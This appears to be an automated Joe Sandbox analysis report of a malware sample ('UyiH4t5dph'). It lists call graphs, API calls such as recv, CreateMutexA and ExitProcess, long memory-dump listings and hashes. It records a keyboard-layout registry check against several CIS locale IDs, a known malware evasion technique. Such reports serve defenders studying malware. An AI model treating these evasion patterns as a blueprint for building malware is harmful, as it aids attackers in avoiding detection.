2daab3 shared_ptr 11801->11808 11803 2daa65 11802->11803 11804 2d5c10 3 API calls 11803->11804 11805 2daa8d 11804->11805 11806 2d5c10 3 API calls 11805->11806 11806->11808 11807 308ab6 RtlAllocateHeap 11807->11808 11808->11807 11809 2dad3c shared_ptr std::invalid_argument::invalid_argument 11808->11809 11813 2d9284 shared_ptr 11810->11813 11811 2d5c10 3 API calls 11811->11813 11812 2d9543 shared_ptr std::invalid_argument::invalid_argument 11812->11801 11813->11811 11818 2d944f shared_ptr 11813->11818 11814 2d5c10 3 API calls 11814->11818 11815 2d98b5 shared_ptr std::invalid_argument::invalid_argument 11815->11801 11816 2d979f shared_ptr 11816->11815 11817 2d5c10 3 API calls 11816->11817 11819 2d9927 shared_ptr std::invalid_argument::invalid_argument 11817->11819 11818->11812 11818->11814 11818->11816 11819->11801 11565 2d20c0 11566 2ec68b __Mtx_init_in_situ 2 API calls 11565->11566 11567 2d20cc 11566->11567 11568 2ed64e RtlAllocateHeap 11567->11568 11569 2d20d6 11568->11569 11582 2de0c0 recv 11583 2de122 recv 11582->11583 11584 2de157 recv 11583->11584 11586 2de191 11584->11586 11585 2de2b3 std::invalid_argument::invalid_argument 11586->11585 11587 2ec6ac GetSystemTimePreciseAsFileTime 11586->11587 11588 2de2ee 11587->11588 11589 2ec26a 4 API calls 11588->11589 11590 2de358 11589->11590 12032 2d9adc 12033 2d9aea 12032->12033 12037 2d9afe shared_ptr 12032->12037 12034 2da917 12033->12034 12033->12037 12035 2da953 Sleep CreateMutexA 12034->12035 12036 2da98e 12035->12036 12038 2d5c10 3 API calls 12037->12038 12039 2d9b7c 12038->12039 12040 2d8b30 3 API calls 12039->12040 12041 2d9b8d 12040->12041 12042 2d5c10 3 API calls 12041->12042 12043 2d9cb1 12042->12043 12044 2d8b30 3 API calls 12043->12044 12045 2d9cc2 12044->12045 12427 2e87d0 12428 2e882a ___std_exception_copy 12427->12428 12434 2e9bb0 12428->12434 12432 2e88d9 std::_Throw_future_error 12433 2e886c std::invalid_argument::invalid_argument 12444 2e9ef0 12434->12444 12436 2e9be5 12437 2d2ce0 InitOnceExecuteOnce 12436->12437 12438 2e9c16 12437->12438 12448 2e9f70 12438->12448 12440 2e8854 12440->12433 12441 2d43f0 12440->12441 12442 2ebedf InitOnceExecuteOnce 12441->12442 12443 2d440a 12442->12443 12443->12432 12445 2e9f0c 12444->12445 12446 2ec68b __Mtx_init_in_situ 2 API calls 12445->12446 12447 2e9f17 12446->12447 12447->12436 12449 2e9fef shared_ptr 12448->12449 12452 2ea058 12449->12452 12453 2ea210 12449->12453 12451 2ea03b 12451->12440 12454 2ea290 12453->12454 12460 2e71d0 12454->12460 12456 2ea2cc shared_ptr 12457 2ea4be shared_ptr 12456->12457 12458 2d3ee0 3 API calls 12456->12458 12457->12451 12459 2ea4a6 12458->12459 12459->12451 12461 2e7211 12460->12461 12468 2d3970 12461->12468 12463 2e7446 std::invalid_argument::invalid_argument 12463->12456 12464 2e72ad ___std_exception_copy 12464->12463 12465 2ec68b __Mtx_init_in_situ 2 API calls 12464->12465 12466 2e7401 12465->12466 12473 2d2ec0 12466->12473 12469 2ec68b __Mtx_init_in_situ 2 API calls 12468->12469 12470 2d39a7 12469->12470 12471 2ec68b __Mtx_init_in_situ 2 API calls 12470->12471 12472 2d39e6 12471->12472 12472->12464 12474 2d2f7e GetCurrentThreadId 12473->12474 12475 2d2f06 12473->12475 12479 2d2f94 12474->12479 12493 2d2fef 12474->12493 12476 2ec6ac GetSystemTimePreciseAsFileTime 12475->12476 12477 2d2f12 12476->12477 12478 2d301e 12477->12478 12485 2d2f1d __Mtx_unlock 12477->12485 12480 2ec26a 4 API calls 12478->12480 12481 2ec6ac GetSystemTimePreciseAsFileTime 12479->12481 12479->12493 12482 2d3024 12480->12482 12484 2d2fb9 12481->12484 12483 2ec26a 4 API calls 12482->12483 12483->12484 12487 2ec26a 4 API calls 12484->12487 12488 2d2fc0 __Mtx_unlock 12484->12488 12485->12482 12486 2d2f6f 12485->12486 12486->12474 12486->12493 12487->12488 12489 2ec26a 4 API calls 12488->12489 12490 2d2fd8 __Cnd_broadcast 12488->12490 12489->12490 12491 2ec26a 4 API calls 12490->12491 12490->12493 12492 2d303c 12491->12492 12494 2ec6ac GetSystemTimePreciseAsFileTime 12492->12494 12493->12463 12502 2d3080 shared_ptr __Mtx_unlock 12494->12502 12495 2d31c5 12496 2ec26a 4 API calls 12495->12496 12497 2d31cb 12496->12497 12498 2ec26a 4 API calls 12497->12498 12499 2d31d1 12498->12499 12500 2ec26a 4 API calls 12499->12500 12508 2d3193 __Mtx_unlock 12500->12508 12501 2d31a7 std::invalid_argument::invalid_argument 12501->12463 12502->12495 12502->12497 12502->12501 12504 2d3132 GetCurrentThreadId 12502->12504 12503 2ec26a 4 API calls 12505 2d31dd 12503->12505 12504->12501 12506 2d313b 12504->12506 12506->12501 12507 2ec6ac GetSystemTimePreciseAsFileTime 12506->12507 12509 2d315f 12507->12509 12508->12501 12508->12503 12509->12495 12509->12499 12509->12508 12510 2ebd4c GetSystemTimePreciseAsFileTime 12509->12510 12510->12509
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,488B5222,488B5222), ref: 002D5DCC
                                                          • RegQueryValueExA.KERNEL32(488B5222,?,00000000,00000000,?,00000400,?,?,00000000,00000001,488B5222,488B5222), ref: 002D5DFA
                                                          • RegCloseKey.KERNEL32(488B5222,?,?,00000000,00000001,488B5222,488B5222), ref: 002D5E06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$invalid stoi argument$stoi argument out of range
                                                          • API String ID: 3677997916-1112634906
                                                          • Opcode ID: 27dd655225a0850f4db5c59ab1d28e4242dd54390765bb4515e93ba0bf3d1fe2
                                                          • Instruction ID: 43c6111f1a8d0e6efb2bd80b3a870790a08759beae93960fbeb8987337d0e169
                                                          • Opcode Fuzzy Hash: 27dd655225a0850f4db5c59ab1d28e4242dd54390765bb4515e93ba0bf3d1fe2
                                                          • Instruction Fuzzy Hash: 11C20171A101589BDF28DF68DC89BEDB779EF44300F50429AE409A72C2DB759EA4CF90

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1113 2d735a-2d7366 1114 2d737c-2d739e call 2ed663 1113->1114 1115 2d7368-2d7376 1113->1115 1121 2d73c8-2d73e0 1114->1121 1122 2d73a0-2d73ac 1114->1122 1115->1114 1116 2d741c-2d74db call 306c6a call 2e7a00 * 6 call 2d72b0 1115->1116 1147 2d74dd-2d74e9 1116->1147 1148 2d7509-2d750f 1116->1148 1123 2d740a-2d741b 1121->1123 1124 2d73e2-2d73ee 1121->1124 1126 2d73be-2d73c5 call 2ed663 1122->1126 1127 2d73ae-2d73bc 1122->1127 1129 2d7400-2d7407 call 2ed663 1124->1129 1130 2d73f0-2d73fe 1124->1130 1126->1121 1127->1116 1127->1126 1129->1123 1130->1116 1130->1129 1151 2d74ff-2d7506 call 2ed663 1147->1151 1152 2d74eb-2d74f9 1147->1152 1149 2d7539-2d753f 1148->1149 1150 2d7511-2d751d 1148->1150 1155 2d7569-2d7584 call 2ecff1 1149->1155 1156 2d7541-2d754d 1149->1156 1153 2d752f-2d7536 call 2ed663 1150->1153 1154 2d751f-2d752d 1150->1154 1151->1148 1152->1151 1157 2d7587-2d75e1 call 306c6a 1152->1157 1153->1149 1154->1153 1154->1157 1161 2d755f-2d7566 call 2ed663 1156->1161 1162 2d754f-2d755d 1156->1162 1171 2d7661-2d76d7 call 2e80c0 * 3 1157->1171 1172 2d75e3-2d75f7 call 2ed111 1157->1172 1161->1155 1162->1157 1162->1161 1188 2d76d9-2d76e5 1171->1188 1189 2d7705-2d771d 1171->1189 1172->1171 1177 2d75f9-2d765e call 2ed64e call 2ed0c7 1172->1177 1177->1171 1190 2d76fb-2d7702 call 2ed663 1188->1190 1191 2d76e7-2d76f5 1188->1191 1192 2d771f-2d772b 1189->1192 1193 2d7747-2d775f 1189->1193 1190->1189 1191->1190 1196 2d779b-2d7810 call 306c6a call 2e8680 call 2e8320 1191->1196 1198 2d773d-2d7744 call 2ed663 1192->1198 1199 2d772d-2d773b 1192->1199 1194 2d7789-2d779a 1193->1194 1195 2d7761-2d776d 1193->1195 1201 2d777f-2d7786 call 2ed663 1195->1201 1202 2d776f-2d777d 1195->1202 1214 2d783e-2d78bd call 2e7a00 * 2 call 2d5c10 call 2e80c0 call 2d72b0 1196->1214 1215 2d7812-2d781e 1196->1215 1198->1193 1199->1196 1199->1198 1201->1194 1202->1196 1202->1201 1239 2d78bf-2d78cb 1214->1239 1240 2d78eb-2d78f1 1214->1240 1216 2d7834-2d783b call 2ed663 1215->1216 1217 2d7820-2d782e 1215->1217 1216->1214 1217->1216 1219 2d797a call 306c6a 1217->1219 1225 2d797f-2d7a4a call 306c6a call 2e7a00 call 2d5c10 call 2e8320 call 2e7a00 call 2d5c10 call 2e80c0 call 2d72b0 1219->1225 1270 2d7a4c-2d7a58 1225->1270 1271 2d7a74-2d7a85 1225->1271 1242 2d78cd-2d78db 1239->1242 1243 2d78e1-2d78e8 call 2ed663 1239->1243 1244 2d791b-2d7933 1240->1244 1245 2d78f3-2d78ff 1240->1245 1242->1225 1242->1243 1243->1240 1251 2d795d-2d7979 call 2ecff1 1244->1251 1252 2d7935-2d7941 1244->1252 1249 2d7911-2d7918 call 2ed663 1245->1249 1250 2d7901-2d790f 1245->1250 1249->1244 1250->1225 1250->1249 1257 2d7953-2d795a call 2ed663 1252->1257 1258 2d7943-2d7951 1252->1258 1257->1251 1258->1225 1258->1257 1272 2d7a6a-2d7a71 call 2ed663 1270->1272 1273 2d7a5a-2d7a68 1270->1273 1277 2d7aaf-2d7ac8 call 2ecff1 1271->1277 1278 2d7a87-2d7a93 1271->1278 1272->1271 1273->1272 1275 2d7ac9 call 306c6a 1273->1275 1284 2d7ace-2d7b1f call 306c6a call 2d6d70 1275->1284 1281 2d7aa5-2d7aac call 2ed663 1278->1281 1282 2d7a95-2d7aa3 1278->1282 1281->1277 1282->1281 1282->1284 1292 2d7b21 1284->1292 1293 2d7b23-2d7b30 1284->1293 1292->1293 1295 2d7b5e-2d7c18 call 2e7a00 call 2d5c10 call 2e7a00 call 2d5c10 call 2e8320 call 2e8220 call 2e7a00 call 2d5c10 call 2e80c0 call 2d72b0 1293->1295 1296 2d7b32-2d7b3e 1293->1296 1343 2d7c1a-2d7c26 1295->1343 1344 2d7c46-2d7c5e 1295->1344 1297 2d7b54-2d7b5b call 2ed663 1296->1297 1298 2d7b40-2d7b4e 1296->1298 1297->1295 1298->1297 1300 2d7d18 call 306c6a 1298->1300 1306 2d7d1d call 306c6a 1300->1306 1310 2d7d22-2d7db2 call 306c6a call 3040f0 1306->1310 1326 2d7db8-2d7f07 call 2e7a00 call 2d5c10 call 2e7a00 call 2d5c10 1310->1326 1327 2d8356-2d8373 call 2ecff1 1310->1327 1380 2d7f0d-2d7f2c 1326->1380 1381 2d82f7-2d82fa 1326->1381 1348 2d7c3c-2d7c43 call 2ed663 1343->1348 1349 2d7c28-2d7c36 1343->1349 1346 2d7c8c-2d7ca4 1344->1346 1347 2d7c60-2d7c6c 1344->1347 1354 2d7cce-2d7cd4 1346->1354 1355 2d7ca6-2d7cb2 1346->1355 1352 2d7c6e-2d7c7c 1347->1352 1353 2d7c82-2d7c89 call 2ed663 1347->1353 1348->1344 1349->1306 1349->1348 1352->1306 1352->1353 1353->1346 1356 2d7cfe-2d7d17 call 2ecff1 1354->1356 1357 2d7cd6-2d7ce2 1354->1357 1361 2d7cc4-2d7ccb call 2ed663 1355->1361 1362 2d7cb4-2d7cc2 1355->1362 1363 2d7cf4-2d7cfb call 2ed663 1357->1363 1364 2d7ce4-2d7cf2 1357->1364 1361->1354 1362->1306 1362->1361 1363->1356 1364->1310 1364->1363 1387 2d82d4-2d82d6 1380->1387 1388 2d7f32-2d7f39 1380->1388 1382 2d82fc-2d8305 1381->1382 1383 2d8351 1381->1383 1385 2d832c-2d832f 1382->1385 1386 2d8307-2d830b 1382->1386 1383->1327 1393 2d833d-2d8349 1385->1393 1394 2d8331-2d833b 1385->1394 1389 2d830d-2d8312 1386->1389 1390 2d8320-2d832a 1386->1390 1395 2d82d8-2d82e2 1387->1395 1396 2d82e4-2d82e7 1387->1396 1391 2d7f3f-2d7f81 call 2e7a00 call 2d5c10 call 2e7a00 call 2d5c10 1388->1391 1392 2d8019-2d82bd call 2e7a00 call 2d5c10 call 2e7a00 call 2d5c10 call 2d5d50 call 2e7a00 call 2d5c10 call 2d5730 call 2e7a00 call 2d5c10 call 2e7a00 call 2d5c10 call 2d5d50 call 2e7a00 call 2d5c10 call 2d5730 call 2e7a00 call 2d5c10 call 2e7a00 call 2d5c10 call 2d5d50 call 2e7a00 call 2d5c10 call 2d5730 call 2e7a00 call 2d5c10 call 2e7a00 call 2d5c10 call 2d5d50 call 2e7a00 call 2d5c10 call 2d5730 1388->1392 1389->1390 1398 2d8314-2d831e 1389->1398 1390->1383 1415 2d7f86-2d7f9b call 2d5d50 1391->1415 1432 2d82c3-2d82cc 1392->1432 1400 2d834c 1393->1400 1394->1383 1395->1400 1396->1383 1397 2d82e9-2d82f5 1396->1397 1397->1400 1398->1383 1400->1383 1419 2d7fa0-2d7fcb call 308bbe 1415->1419 1426 2d7fcd-2d7fdc 1419->1426 1427 2d8002-2d8004 1419->1427 1429 2d7fde-2d7fec 1426->1429 1430 2d7ff2-2d7fff call 2ed663 1426->1430 1431 2d800a-2d8014 1427->1431 1427->1432 1429->1430 1434 2d8379-2d837f call 306c6a 1429->1434 1430->1427 1431->1432 1432->1381 1437 2d82ce 1432->1437 1437->1387
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ConditionVariableWake
                                                          • String ID:
                                                          • API String ID: 1192502693-0
                                                          • Opcode ID: 6160e6a32d8ec37b58718b8da806191a024a01a98541ff6f699814c81b5d3013
                                                          • Instruction ID: d00581901cd729cb179b754882053b51674d7aaa303e73b2aa55acaca1300274
                                                          • Opcode Fuzzy Hash: 6160e6a32d8ec37b58718b8da806191a024a01a98541ff6f699814c81b5d3013
                                                          • Instruction Fuzzy Hash: FD726B71A202849BEB09DF28DC86BDDBB79EF45300F50465EF814973C1EB399E948B91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1784 30652b-306538 call 30a302 1787 30655a-30656c call 30656d ExitProcess 1784->1787 1788 30653a-306548 GetPEB 1784->1788 1788->1787 1790 30654a-306559 1788->1790 1790->1787
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,0030652A,?,?,?,?,?,00307661), ref: 00306567
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
